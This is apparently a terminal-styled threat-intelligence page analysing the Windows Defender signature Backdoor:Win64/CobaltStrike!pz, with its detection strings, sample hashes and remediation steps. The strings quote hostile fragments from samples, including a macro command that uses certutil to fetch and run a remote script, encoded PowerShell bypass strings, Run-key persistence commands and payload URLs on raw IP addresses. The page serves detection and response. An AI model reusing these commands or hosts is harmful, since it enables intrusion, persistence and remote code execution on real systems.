user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Backdoor:Win64/CobaltStrike!pz
Backdoor:Win64/CobaltStrike!pz - Windows Defender threat signature analysis

Backdoor:Win64/CobaltStrike!pz - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Backdoor:Win64/CobaltStrike!pz
Classification:
Type:Backdoor
Platform:Win64
Family:CobaltStrike
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!pz
Packed or compressed to evade detection
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Backdoor - Provides unauthorized remote access for 64-bit Windows platform, family CobaltStrike

Summary:

This detection identifies a Cobalt Strike Beacon, a potent post-exploitation framework used by advanced threat actors. The threat establishes persistence via scheduled tasks and provides the attacker with full remote control to execute commands, steal data, and move laterally within the network.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - \cobaltstrike 3.14\payload\AvByPass (PEHSTR_EXT)
 - S/F /Create /TN Tencentid /sc minute /MO 1 /TR C:\Users\Public\Music\tencentsoso.exe (PEHSTR)
 - C:\Users\Public\Music\cia.plan (PEHSTR)
 - !C:\Users\Public\Music\SideBar.dll (PEHSTR)
 - artifact64big.dll (PEHSTR_EXT)
 - artifact32big.dll (PEHSTR_EXT)
 - K[ZKK\OKM (PEHSTR_EXT)
 - GetCommandLineA (PEHSTR_EXT)
 - GetCommandLineW (PEHSTR_EXT)
 - \\.\pipe\MSSE-1966-server (PEHSTR_EXT)
 - temp.dll (PEHSTR_EXT)
 - ././., (PEHSTR_EXT)
 - .,./., (PEHSTR_EXT)
 - /posts/ (PEHSTR_EXT)
 - /ivc/ (PEHSTR_EXT)
 - /k&>}2 (SNID)
 - vN.6b (SNID)
 - Microsoft Base Cryptographic Provider v1.0 (PEHSTR_EXT)
 - HttpAddRequestHeadersA (PEHSTR_EXT)
 - beacon.dll (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - \\.\pipe\bypassuac (PEHSTR_EXT)
 - \\.\pipe\keylogger (PEHSTR_EXT)
 - /send%s (PEHSTR_EXT)
 - rcap:// (PEHSTR_EXT)
 - \\.\pipe\netview (PEHSTR_EXT)
 - \\.\pipe\powershell (PEHSTR_EXT)
 - \\.\pipe\screenshot (PEHSTR_EXT)
 - \\.\pipe\elevate (PEHSTR_EXT)
 - \\.\pipe\hashdump (PEHSTR_EXT)
 - Global\SAM (PEHSTR_EXT)
 - \\.\pipe\portscan (PEHSTR_EXT)
 - \\%s\ipc$ (PEHSTR_EXT)
 - \\.\pipe\sshagent (PEHSTR_EXT)
 - COBALTSTRIKE (PEHSTR_EXT)
 - %1024[^ ] %8[^:]://%1016[^/]%7168 (PEHSTR_EXT)
 - \\%s\pipe\msagent_%x (PEHSTR_EXT)
 - [command] (PEHSTR_EXT)
 - \\.\pipe\mimikatz (PEHSTR_EXT)
 - test.dll (PEHSTR_EXT)
 - shellcodeexecute (PEHSTR_EXT)
 - Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
 - CWEMRvwtJNovrrWsIwERjSjD (PEHSTR_EXT)
 - github.com/mitre/gocat/ (PEHSTR_EXT)
 - AS\e\%r (SNID)
 - could not run command (w/ token) because of its length of %d bytes! (PEHSTR_EXT)
 - powershell -nop -exec bypass -EncodedCommand "%s" (PEHSTR_EXT)
 - spawn::decrypting... (PEHSTR)
 - \regedit.exe (PEHSTR)
 - tps://122.228.7.225/admin?file= (PEHSTR_EXT)
 - 122.193.130.74 (PEHSTR_EXT)
 - 121.207.229.145 (PEHSTR_EXT)
 - File Download Success. (PEHSTR_EXT)
 - download.exe (PEHSTR_EXT)
 - /checker (PEHSTR_EXT)
 - YG@JG\ (PEHSTR_EXT)
 - |ZB{]K\zF\KOJ}ZO\Z (PEHSTR_EXT)
 - HTTP/1.1 200 OK (PEHSTR_EXT)
 - %02d/%02d/%02d %02d:%02d:%02d (PEHSTR_EXT)
 - CFy92ROzKls\ro\HwtAF.pdb (PEHSTR_EXT)
 - r8BsHuPe56l\ilYp\i12tW5S7m3 (PEHSTR_EXT)
 - /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v  (PEHSTR_EXT)
 -  /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_ (PEHSTR_EXT)
 - 7I.S_T (SNID)
 - \.\pipe\Vmware.0000000000.0002 (PEHSTR_EXT)
 - 127.0.0.1 (PEHSTR_EXT)
 - gigabigsvc.dll (PEHSTR_EXT)
 - cmd.exe (PEHSTR_EXT)
 - \>~gZ (SNID)
 - shellcodeloading/checkSandbox.timeSleep (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.physicalMemory (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.numberOfCPU (PEHSTR_EXT)
 - sync.(*Mutex).Lock (PEHSTR_EXT)
 - crypto/cipher.xorBytes (PEHSTR_EXT)
 - shellcodeloading/aes.AesDecrypt (PEHSTR_EXT)
 - runtime.injectglist (PEHSTR_EXT)
 - sync.(*Mutex).lockSlow (PEHSTR_EXT)
 - sync.(*entry).load (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.CheckSandbox (PEHSTR_EXT)
 - crypto/cipher.NewCBCDecrypter (PEHSTR_EXT)
 - crypto/cipher.xorBytesSSE2 (PEHSTR_EXT)
 - crypto/aes.decryptBlockGo (PEHSTR_EXT)
 - 0.bin (PEHSTR_EXT)
 - \Bypass_AV.pdb (PEHSTR_EXT)
 - Bypass_AV.pdb (PEHSTR_EXT)
 - InternetReadFile(...) (PEHSTR_EXT)
 - HttpSendRequestA(...) (PEHSTR_EXT)
 - /htEp (PEHSTR_EXT)
 - oshi.at (PEHSTR_EXT)
 - UserInitMprLogonScript (PEHSTR_EXT)
 - notepad.exe (PEHSTR_EXT)
 - %s as %s\%s: %d (PEHSTR_EXT)
 - beacon.x64.dll (PEHSTR_EXT)
 - Updater.dll (PEHSTR_EXT)
 - Content-Type: application/octet-stream (PEHSTR_EXT)
 - DllMain (PEHSTR_EXT)
 - DllRegisterServer (PEHSTR_EXT)
 - hovitdz.dll (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%ckirito\asuna (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cwarcraft\dota (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cralka\ribak (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cmark\dabollo (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cpapizor\gojo (PEHSTR_EXT)
 - cmd /c C:\Windows\Temp (PEHSTR_EXT)
 - DllGetClassObject (PEHSTR_EXT)
 - executeShellcode (PEHSTR_EXT)
 - \SLN\HRM_SUB\ (PEHSTR_EXT)
 -  \HRM_SUB.pdb (PEHSTR_EXT)
 - AVBypass.pdb (PEHSTR_EXT)
 - http_dll.dat (PEHSTR_EXT)
 - weeulsf763bs1.dll (PEHSTR_EXT)
 - //rs.qbox.me/chtype/ (PEHSTR_EXT)
 - Dbak/chdb:qiniu.png (PEHSTR_EXT)
 - 252.72.131.228 (PEHSTR_EXT)
 - 240.232.200.0 (PEHSTR_EXT)
 - 0.0.65.81 (PEHSTR_EXT)
 - 65.80.82.81 (PEHSTR_EXT)
 - 86.72.49.210 (PEHSTR_EXT)
 - 101.72.139.82 (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - Aborting... (PEHSTR_EXT)
 - -sta -noprofile -executionpolicy bypass -encodedcommand (PEHSTR_EXT)
 - Press any key... (PEHSTR_EXT)
 - http://144.48.240.85/18.exe (PEHSTR_EXT)
 - 4Bejz8txQ/rDnf (PEHSTR_EXT)
 - ShellCodeLoader\bin (PEHSTR_EXT)
 - http://49.234.65.52/UpdateStream_x86.cab (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - \x91\xe1\xa19 (PEHSTR_EXT)
 - \xE9\xE8\Xa1 (PEHSTR_EXT)
 - 0ZNA3EZ4g.exe (PEHSTR_EXT)
 - 0ZNA3EZ4g.xlsx (PEHSTR_EXT)
 - legacy.chunk.js (PEHSTR_EXT)
 - windows\temp\ (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - getparagraphopendllpathforbinaryas1put1bclose1 (MACROHSTR_EXT)
 - namefnzstasstatbase64decodexe1py3jvc29mdfxuzwftc1xjdxjyzw50etdsendifend (MACROHSTR_EXT)
 - [i] Injecting The Reflective DLL Into (PEHSTR_EXT)
 - RlfDllInjector.pdb (PEHSTR_EXT)
 - windows.ini (PEHSTR)
 - mgur730yw1.dll (PEHSTR_EXT)
 - \Parallel_Asis.dll (PEHSTR_EXT)
 - mscorsvc.dll (PEHSTR_EXT)
 - 1.dll (PEHSTR_EXT)
 - Loader.nim (PEHSTR_EXT)
 - bcmode.nim (PEHSTR_EXT)
 - Test.dll (PEHSTR_EXT)
 - \.\PhysicalDrive0 (PEHSTR_EXT)
 - temp\packed64-temp.pdb (PEHSTR_EXT)
 - \projects\garda\storage\targets\work6.x2.pdb (PEHSTR_EXT)
 - .sedata (PEHSTR_EXT)
 - .gehc (PEHSTR_EXT)
 - Release\movenpeak.pdb (PEHSTR_EXT)
 - System.Web.ni.dll (PEHSTR_EXT)
 - 0cobaltstrike-chtsec (PEHSTR_EXT)
 - ({y#y/ (SNID)
 - DetectAttack.dll (PEHSTR_EXT)
 - x64\Debug\DetectAttack.pdb (PEHSTR_EXT)
 - powershell -nop -exec bypass -EncodedCommand (PEHSTR_EXT)
 - nfvurg856lk63.dll (PEHSTR_EXT)
 - programdata\3bef479.tmp (PEHSTR_EXT)
 - Release\SetupEngine.pdb (PEHSTR_EXT)
 - Applebaidugooglebingcsdnbokeyuanhelloworld.com (PEHSTR_EXT)
 - ;\$ r (PEHSTR_EXT)
 - PolicyPlus.Resources.resources (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cnetsvc\ (PEHSTR_EXT)
 - enhanced-google.com (PEHSTR_EXT)
 - Control_RunDLL "C:\ProgramData\AxlnstSV\xlsrd.cpl (PEHSTR_EXT)
 - E2/L9L$@ (PEHSTR_EXT)
 - CymulateStagelessMeterpreterDll.dll (PEHSTR_EXT)
 - \Cymulate\Agent\AttacksLogs\edr (PEHSTR_EXT)
 - Memory permissions changed successfully: PAGE_EXECUTE (PEHSTR_EXT)
 - QlZylT5WMZcGIAyTUbSGnAerR.resources (PEHSTR_EXT)
 - New Project 2.exe (PEHSTR_EXT)
 - raw.githubusercontent.com/kk-echo123/aoisndoi/ (PEHSTR_EXT)
 - .retplne (PEHSTR_EXT)
 - wsc_UUIDS.dll (PEHSTR_EXT)
 - D:\project\doge-cloud\targetfiles (PEHSTR_EXT)
 - on_avast_dll_unload (PEHSTR_EXT)
 - main.AesDecrypt (PEHSTR_EXT)
 - peloader\peloader_64\ (PEHSTR_EXT)
 - \Release\peloader (PEHSTR_EXT)
 - StartDllLoadData (PEHSTR_EXT)
 - vscodeWorkSpace\shellcode\whiteandblack (PEHSTR_EXT)
 - AvastSvc.exe (PEHSTR_EXT)
 - kpm_tray.exe (PEHSTR_EXT)
 - AtomLdr.dll (PEHSTR_EXT)
 - A7d8Gw8XN////76uvq+trqm3zi2at3Stn7d0ree3dK3ft3SNr7fwSLW1ss42t84/U (PEHSTR_EXT)
 - RunScript (PEHSTR_EXT)
 - PoolAndSpaDepot.My.Resources (PEHSTR_EXT)
 - test1\source\repos\download\x64\Release\download.pdb (PEHSTR_EXT)
 - \SudSolver.pdb (PEHSTR_EXT)
 - jsporvjlfsqmlsamxdrvitxha (PEHSTR_EXT)
 - api.gogleapi.click/file/System/ (PEHSTR_EXT)
 - Projects\evasionC_go\workingSpace (PEHSTR_EXT)
 - _seh_filter_dll (PEHSTR_EXT)
 - BoevVBacejSmwcZ (PEHSTR_EXT)
 - \Shellcode\ReflectiveLoader.pdb (PEHSTR_EXT)
 - /|bD;X (SNID)
 - MACOSX\pdf.pdf (PEHSTR_EXT)
 - sync.(*RHe0UcdpHEv).RUnlock (PEHSTR_EXT)
 - nX0mgbuOjw.(*wU6_Xfv4).bqwSOvr5m (PEHSTR_EXT)
 - yCcdI7eVq.(*UE5TRl).xKFXpU5Cyab (PEHSTR_EXT)
 - PT2MtVR9gr5.go (PEHSTR_EXT)
 - CallDLLDynamic.pdb (PEHSTR_EXT)
 - per_thread_data.cpp (PEHSTR_EXT)
 - [*] Executing (PEHSTR_EXT)
 - ConsoleApp1.exe (PEHSTR_EXT)
 - n/q9) (SNID)
 - ,!B2,/H;t$ (PEHSTR_EXT)
 - krpt_RemoveDllFilterProtectDetour (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - GEMS\GEMS\obj\Release\GEMS.pdb (PEHSTR_EXT)
 - Users\Apocalypse\ (PEHSTR_EXT)
 - \Rust\client\1.pdb (PEHSTR_EXT)
 - 57k7w2hd52.8pfyh.ws:8443/TseNn7 (PEHSTR_EXT)
 - quiomnissitaliquidmolestias24.dll (PEHSTR_EXT)
 - xxxx.dll (PEHSTR_EXT)
 - DllUnregisterServer (PEHSTR_EXT)
 - /Mark\NewVirus\CPP\msedge\x64\Release\msedge.pdb (PEHSTR)
 - msedge.dll (PEHSTR)
 - http://www.flntp.ro/fintp.x64.bin (PEHSTR_EXT)
 - ConsoleApplication6.pdb (PEHSTR_EXT)
 - systeminfo.txt (PEHSTR_EXT)
 - dfbfdhbfddfbfdnhdfhfd.fll (PEHSTR_EXT)
 - D$.2D$FC (PEHSTR_EXT)
 - D$/2D$GC (PEHSTR_EXT)
 - C:\Users\Public (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - NewWYDll\NewWYDll\Release\NewWYDll.pdb (PEHSTR_EXT)
 - %s\updater.exe (PEHSTR_EXT)
 - %s\libcurl.dll (PEHSTR_EXT)
 - cobalt-strike-master\x64\Release\msedge.pdb (PEHSTR_EXT)
 - \Windows\CurrentVersion\Run (PEHSTR_EXT)
 - \mfehcs.exe (PEHSTR_EXT)
 - cmd /c taskkill /F /PID (PEHSTR_EXT)
 - \MyNewDLL\x64\Release\pdh.pdb (PEHSTR_EXT)
 - libEGL.dll.pdb (PEHSTR_EXT)
 - kapitalbankaz.azurewebsites.net/api/getit (PEHSTR_EXT)
 - InternetExplorer.pdb (PEHSTR_EXT)
 - http://149.28.222.244:8000/ (PEHSTR_EXT)
 - Shellcode decryption complete. (PEHSTR_EXT)
 - f574d29994a3adc68dcbd2a39596331713957734.bin.packed.dll (PEHSTR_EXT)
 - Wininet. (PEHSTR_EXT)
 - dll (PEHSTR_EXT)
 - Press <Enter> To Execute The Payload ... (PEHSTR_EXT)
 - \SophosUninstall.p (PEHSTR_EXT)
 - SophosFS.p (PEHSTR_EXT)
 - SophosNtpUninstall.p (PEHSTR_EXT)
 - SophosFSTelemetry.p (PEHSTR_EXT)
 - /CPNGXa3g1gm8hD3zsdW (PEHSTR_EXT)
 - lease\Project5.pdb (PEHSTR_EXT)
 - minimaaccusamusnihilvoluptaset90.dll (PEHSTR_EXT)
 - Decrypted %d... (%d %%) i = %d; full_length = %d (PEHSTR_EXT)
 - Decrypted %d...ok! (PEHSTR_EXT)
 - *,d:/th/ds/ext/aad (PEHSTR_EXT)
 - NLc0MDg9zP6VTvRMbffF0O23WgXbBZBl3PO9/14+ABQ= (PEHSTR_EXT)
 - atks.exe (PEHSTR_EXT)
 - ://0x1.social (PEHSTR_EXT)
 - 47.92.131.203 (PEHSTR_EXT)
 - Windows.pdb (PEHSTR_EXT)
 - .C0D. (PEHSTR_EXT)
 - main.xorDecrypt (PEHSTR_EXT)
 - main.AesDecryptCFB (PEHSTR_EXT)
 - main.refun (PEHSTR_EXT)
 - main.run (PEHSTR_EXT)
 - d20%:d20%:d20% d20%/d20%/d20% (PEHSTR)
 - 0% d20%/d20%/d20 (PEHSTR)
 - g('http://47.106.67.138:80/a')) (PEHSTR_EXT)
 - System.Management.Automation.AmsiUtils (PEHSTR_EXT)
 - main.AesDecryptByECB (PEHSTR_EXT)
 - main.PKCS7UNPadding (PEHSTR_EXT)
 - main.closeWindows (PEHSTR_EXT)
 - runtime.sysReserve (PEHSTR_EXT)
 - runtime.badctxt (PEHSTR_EXT)
 - runtime.allgadd (PEHSTR_EXT)
 - runtime.traceShuttingDown (PEHSTR_EXT)
 - runtime.traceLocker.GoSched (PEHSTR_EXT)
 - \$0E3 (PEHSTR)
 - lease\x64\overseer.pdb (PEHSTR_EXT)
 - axy1/TpcPcZwBtQYcCL6rREEc/8XLJ (PEHSTR_EXT)
 - maskdesk.info (PEHSTR_EXT)
 - /file (PEHSTR_EXT)
 - System32\notepad.exe (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - almounah/go-buena-clr (PEHSTR_EXT)
 - chrome_decrypt.log (PEHSTR_EXT)
 - Windows\CurrentVersion\Run (PEHSTR_EXT)
 - f_u_c_k...... (PEHSTR_EXT)
 - Ran CobaltStrike (PEHSTR_EXT)
 - ReverseShell_%s_%s.exe (PEHSTR_EXT)
 - aLdbcGgcd@hdf;iff9igf5jgg/khg)khg (PEHSTR_EXT)
 - bWebdRgceNhdfHjehAjfh<lhi9lij6mij/njk(njk (PEHSTR_EXT)
 - fbdXhdeSiegOjfhGlhiAmij<mik9okl5okl.plm'qll!rnn (PEHSTR_EXT)
 - alfccahdfZjfhUkgjOmijHnklBqmm>qmn:rno6soo.sop'tpp!wsr (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: 0be5b92bd1e8acef055ef1f1de67aef5.exe
5a5c149b165ec4d6366c2ffdf1c9bfc2138577cb5b058ee852bdf4c6d978fd06
07/12/2025
VirusTotalDownload Sample
Filename: stagedx64.exe
5fc803d3a97caa8c482a4e69cdc513e72a2c8c8eac47329c481b1da792deab46
07/12/2025
VirusTotalDownload Sample
Filename: RD.exe
6f0c0284719b3d4eb15f796f04d806171118fa5c4b42e5cb38433c68d6f919ec
06/12/2025
VirusTotalDownload Sample
Filename: RD.exe
f5c7faca5b5563e4740a6d2196acfb3626ecbcd38da4d690dc23e13e7ecf747c
05/12/2025
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the affected machine from the network to prevent lateral movement. Investigate the scope of the compromise, as other systems are likely affected. Remove identified malicious files and persistence mechanisms, reset all credentials on the system, and re-image the device from a known-good source.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 05/12/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$